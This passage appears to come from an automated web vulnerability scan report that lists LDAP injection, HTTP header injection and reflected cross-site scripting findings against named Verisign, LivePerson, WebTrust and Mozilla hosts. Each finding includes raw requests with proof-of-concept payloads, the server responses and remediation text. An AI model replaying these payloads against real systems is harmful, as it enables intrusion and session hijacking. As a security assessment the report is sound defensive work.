Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
Set-Cookie: LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; expires=Sat, 08-Sep-2012 21:36:35 GMT; path=/hc/71097838; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 427

lpConnLib.Process({"ResultSet": {"lpCallId":"466464716009-798532190732","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SET-REJECT", "js_code": "lpMTag.lpVisitorStatus = 'REJECT_STATUS';"},{"code_id": "INVITE-TIMEOUT", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});

Request 2

GET /hc/71097838/?&site=71097838&cmd=mTagInviteTimeout&lpCallId=466464716009-798532190732&protV=20&lpjson=1&page=http%3A//store.symantec.com/%3Finid%3Dus_pagenotfound_smb_store&id=4734450057&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&title=Buy%20Symantec%20Business%20Products%20-%20Shop%20Small%20Business%20%7C%20Symantec%20Business%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&timeout=120&channel=web&t=*)!(sn=* HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://store.symantec.com/?inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147

Response 2

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:36 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:36:36 GMT
Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 427

lpConnLib.Process({"ResultSet": {"lpCallId":"466464716009-798532190732","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SET-REJECT", "js_code": "lpMTag.lpVisitorStatus = 'REJECT_STATUS';"},{"code_id": "INVITE-TIMEOUT", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});

1.12. http://sales.liveperson.net/hc/71097838/ [timeout parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sales.liveperson.net
Path:   /hc/71097838/

Issue detail

The timeout parameter appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the timeout parameter. These two requests resulted in different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /hc/71097838/?&site=71097838&cmd=mTagInviteTimeout&lpCallId=466464716009-798532190732&protV=20&lpjson=1&page=http%3A//store.symantec.com/%3Finid%3Dus_pagenotfound_smb_store&id=4734450057&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&title=Buy%20Symantec%20Business%20Products%20-%20Shop%20Small%20Business%20%7C%20Symantec%20Business%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&timeout=*)(sn=*&channel=web&t=1 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://store.symantec.com/?inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147

Response 1

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:36:08 GMT
Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
Set-Cookie: LivePersonID=-5110247826455-1315603887:-1:1315604093:-1:-1; expires=Sat, 08-Sep-2012 21:36:08 GMT; path=/hc/71097838; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 94

lpConnLib.Process({"ResultSet": {"lpCallId":"466464716009-798532190732","lpCallConfirm":""}});

Request 2

GET /hc/71097838/?&site=71097838&cmd=mTagInviteTimeout&lpCallId=466464716009-798532190732&protV=20&lpjson=1&page=http%3A//store.symantec.com/%3Finid%3Dus_pagenotfound_smb_store&id=4734450057&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&title=Buy%20Symantec%20Business%20Products%20-%20Shop%20Small%20Business%20%7C%20Symantec%20Business%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&timeout=*)!(sn=*&channel=web&t=1 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://store.symantec.com/?inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147

Response 2

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:36:10 GMT
Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 94

lpConnLib.Process({"ResultSet": {"lpCallId":"466464716009-798532190732","lpCallConfirm":""}});

2. HTTP header injection

There are 5 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. https://idprotect.verisign.com/toolbar/activate.v [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://idprotect.verisign.com
Path:   /toolbar/activate.v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload b75a9%0d%0a75e798ebedb was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /toolbar/b75a9%0d%0a75e798ebedb HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: idprotect.verisign.com
Connection: Keep-Alive

Response

HTTP/1.0 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:47:54 GMT
Location: https://idprotect.verisign.com/toolbar/b75a9
75e798ebedb
.v
Content-Length: 0
Connection: close
Content-Type: text/plain


2.2. https://idprotect.verisign.com/toolbar/download.v [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://idprotect.verisign.com
Path:   /toolbar/download.v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload e39d2%0d%0acc51e9a9020 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /toolbar/e39d2%0d%0acc51e9a9020 HTTP/1.1
Host: idprotect.verisign.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://idprotect.verisign.com/toolbar/home.v
Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:47:54 GMT
Location: https://idprotect.verisign.com/toolbar/e39d2
cc51e9a9020
.v
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain


2.3. https://idprotect.verisign.com/toolbar/downloadIE.v [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://idprotect.verisign.com
Path:   /toolbar/downloadIE.v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload b8c36%0d%0ab68ecacc3e6 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /toolbar/b8c36%0d%0ab68ecacc3e6 HTTP/1.1
Host: idprotect.verisign.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://idprotect.verisign.com/toolbar/install.v
Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:48:19 GMT
Location: https://idprotect.verisign.com/toolbar/b8c36
b68ecacc3e6
.v
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain


2.4. https://idprotect.verisign.com/toolbar/home.v [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://idprotect.verisign.com
Path:   /toolbar/home.v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 2c8db%0d%0a9a17d95f3a9 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /toolbar/2c8db%0d%0a9a17d95f3a9 HTTP/1.1
Host: idprotect.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:42:10 GMT
Location: https://idprotect.verisign.com/toolbar/2c8db
9a17d95f3a9
.v
Content-Length: 0
Connection: close
Content-Type: text/plain


2.5. https://idprotect.verisign.com/toolbar/install.v [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://idprotect.verisign.com
Path:   /toolbar/install.v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 8796f%0d%0aaa90b981baa was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /toolbar/8796f%0d%0aaa90b981baa HTTP/1.1
Host: idprotect.verisign.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://idprotect.verisign.com/toolbar/download.v
Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:47:55 GMT
Location: https://idprotect.verisign.com/toolbar/8796f
aa90b981baa
.v
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain


3. Cross-site scripting (reflected)
There are 35 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. https://cert.webtrust.org/ViewSeal [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://cert.webtrust.org
Path:   /ViewSeal

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload e2636<script>alert(1)</script>2536d5d1b26 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ViewSeal?id=304e2636<script>alert(1)</script>2536d5d1b26 HTTP/1.1
Host: cert.webtrust.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 20:14:35 GMT
Server: Apache Tomcat/4.0.6 (HTTP/1.1 Connector)
X-Cache: MISS from cert.webtrust.org
Connection: close
Content-Type: text/html
Content-Length: 2976

java.lang.NumberFormatException: For input string: "304e2636<script>alert(1)</script>2536d5d1b26"
   at java.lang.NumberFormatException.forInputString(NumberFormatException.java:48)
   at java.lang.Integer.parseInt(Integer.java:435)
   at java.lang.Integer.parseInt(Integer.java:476)
   at ca.cica.servlet
...[SNIP]...

3.2. http://com-verisign.netmng.com/ [height parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://com-verisign.netmng.com
Path:   /

Issue detail

The value of the height request parameter is copied into the HTML document as plain text between tags. The payload 42f25<script>alert(1)</script>04b6e822761 was submitted in the height parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?function=createPopinWindow&name=screen1&width=754&height=42f25<script>alert(1)</script>04b6e822761&rand=0.03673732164315879&nm_input_data=%22%22 HTTP/1.1
Host: com-verisign.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=78646006-8f5c-4a4b-87b8-c0cb592c83ce; cdb0=1.115936731645.5075.231152664.7153855158.0; cdbp=0,42,0; cdb1=; cdb2=; cdb3=; EVO5_OPT=1; evo5_VERISIGN_popin=1; evo5_VERISIGN=xep22ngsyerii%7COWn3FV9W0IGSJLrIppIRrZfSVe1We35EI4V4gBbixt8vL04ZKRREeQ778xI3DBjSo3Pq49K1cfcVvCg7qSIKn44I4XJ6cPR3Yj9Y3%2BMmEuQ5%2FYKzCkMnasBxmIRyKGTNYwlD1dvGPKbFxRFCvXppOCDQTBscyOfjUpXgtoyIAMmYbof2%2FajobILQpOxOi2Hs0x9UdZmRfM%2Fuoq9V0S17NeIqzDx%2BsP4gdfn5KCU%2F47pq%2B7rEF0aHB6ftFm0dez3T

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:28:39 GMT
Server: Apache/2.2.9
P3P: policyref="http://com-verisign.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Wed, 07 Sep 2011 21:28:39 GMT
Last-Modified: Wed, 07 Sep 2011 21:28:39 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18558

nm_Popin.arrPopinWindow['screen1'].createPopinWindow(754,42f25<script>alert(1)</script>04b6e822761, '<form name=\"screen1\" onsubmit=\"return false;\" method=\"get\"> <input type=\"hidden\" nam
...[SNIP]...

3.3. http://com-verisign.netmng.com/ [width parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://com-verisign.netmng.com
Path:   /

Issue detail

The value of the width request parameter is copied into the HTML document as plain text between tags. The payload ef64f<script>alert(1)</script>1df44e97474 was submitted in the width parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?function=createPopinWindow&name=screen1&width=754ef64f<script>alert(1)</script>1df44e97474&height=400&rand=0.03673732164315879&nm_input_data=%22%22 HTTP/1.1
Host: com-verisign.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=78646006-8f5c-4a4b-87b8-c0cb592c83ce; cdb0=1.115936731645.5075.231152664.7153855158.0; cdbp=0,42,0; cdb1=; cdb2=; cdb3=; EVO5_OPT=1; evo5_VERISIGN_popin=1; evo5_VERISIGN=xep22ngsyerii%7COWn3FV9W0IGSJLrIppIRrZfSVe1We35EI4V4gBbixt8vL04ZKRREeQ778xI3DBjSo3Pq49K1cfcVvCg7qSIKn44I4XJ6cPR3Yj9Y3%2BMmEuQ5%2FYKzCkMnasBxmIRyKGTNYwlD1dvGPKbFxRFCvXppOCDQTBscyOfjUpXgtoyIAMmYbof2%2FajobILQpOxOi2Hs0x9UdZmRfM%2Fuoq9V0S17NeIqzDx%2BsP4gdfn5KCU%2F47pq%2B7rEF0aHB6ftFm0dez3T

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:28:36 GMT
Server: Apache/2.2.9
P3P: policyref="http://com-verisign.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Wed, 07 Sep 2011 21:28:36 GMT
Last-Modified: Wed, 07 Sep 2011 21:28:36 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18562

nm_Popin.arrPopinWindow['screen1'].createPopinWindow(754ef64f<script>alert(1)</script>1df44e97474, 400, '<form name=\"screen1\" onsubmit=\"return false;\" method=\"get\"> <input type=\"hidden\"
...[SNIP]...

3.4. https://donate.mozilla.org/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://donate.mozilla.org
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 559c1<script>alert(1)</script>34648dd8ac9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico559c1<script>alert(1)</script>34648dd8ac9 HTTP/1.1
Host: donate.mozilla.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: WT_FPC=id=50.23.123.106-1186922976.30162294:lv=1315481521865:ss=1315481112751; X-CheckNode=; X-Mapping-jljaemke=1CFCBA838EC874D34F4F849FD7A403BC

Response

HTTP/1.0 404 Not Found
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Date: Fri, 09 Sep 2011 22:14:57 GMT
X-Served-By: moz2
Connection: Keep-Alive
Set-Cookie: X-CheckNode=true; domain=donate.mozilla.org; path=/
Content-Length: 310

<html>
<head>
<title>Error 404</title>
</head>
<body>
<h1>Sorry, File Not Found: 404</h1>
<p>Invalid URL /favicon.ico559c1<script>alert(1)</script>34648dd8ac9</p><p><a href="http://donate.
...[SNIP]...

3.5. https://donate.mozilla.org/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://donate.mozilla.org
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 29f1f<script>alert(1)</script>971a874b532 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?29f1f<script>alert(1)</script>971a874b532=1 HTTP/1.1
Host: donate.mozilla.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: WT_FPC=id=50.23.123.106-1186922976.30162294:lv=1315481521865:ss=1315481112751; X-CheckNode=; X-Mapping-jljaemke=1CFCBA838EC874D34F4F849FD7A403BC

Response

HTTP/1.0 404 Not Found
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Date: Fri, 09 Sep 2011 22:14:56 GMT
X-Served-By: moz2
Connection: Keep-Alive
Set-Cookie: X-CheckNode=true; domain=donate.mozilla.org; path=/
Content-Length: 313

<html>
<head>
<title>Error 404</title>
</head>
<body>
<h1>Sorry, File Not Found: 404</h1>
<p>Invalid URL /favicon.ico?29f1f<script>alert(1)</script>971a874b532=1</p><p><a href="http://dona
...[SNIP]...

3.6. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://donate.mozilla.org
Path:   /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a47c6<script>alert(1)</script>68ca81f006 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page1166c%3Cscript%3Ealert(document.location)%3Ca47c6<script>alert(1)</script>68ca81f006/script%3E98501cf3ded/contribute/openwebfund HTTP/1.1
Host: donate.mozilla.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: WT_FPC=id=50.23.123.106-1186922976.30162294:lv=1315481521865:ss=1315481112751

Response

HTTP/1.0 404 Not Found
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Date: Fri, 09 Sep 2011 22:14:57 GMT
Connection: Keep-Alive
Set-Cookie: X-CheckNode=; domain=donate.mozilla.org; path=/
Content-Length: 390

<html>
<head>
<title>Error 404</title>
</head>
<body>
<h1>Sorry, File Not Found: 404</h1>
<p>Invalid URL /page1166c%3Cscript%3Ealert(document.location)%3Ca47c6<script>alert(1)</script>68ca81f006/script%3E98501cf3ded/contribute/openwebfund</p>
...[SNIP]...

3.7. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://donate.mozilla.org
Path:   /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 809c8<script>alert(1)</script>eb7bb1b1504 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded809c8<script>alert(1)</script>eb7bb1b1504/contribute/openwebfund HTTP/1.1
Host: donate.mozilla.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: WT_FPC=id=50.23.123.106-1186922976.30162294:lv=1315481521865:ss=1315481112751

Response

HTTP/1.0 404 Not Found
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Date: Fri, 09 Sep 2011 22:14:58 GMT
Connection: Keep-Alive
Set-Cookie: X-CheckNode=; domain=donate.mozilla.org; path=/
Content-Length: 391

<html>
<head>
<title>Error 404</title>
</head>
<body>
<h1>Sorry, File Not Found: 404</h1>
<p>Invalid URL /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded809c8<script>alert(1)</script>eb7bb1b1504/contribute/openwebfund</p>
...[SNIP]...

3.8. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://donate.mozilla.org
Path:   /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 91fb8<script>alert(1)</script>7f56fd6704d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute91fb8<script>alert(1)</script>7f56fd6704d/openwebfund HTTP/1.1
Host: donate.mozilla.org
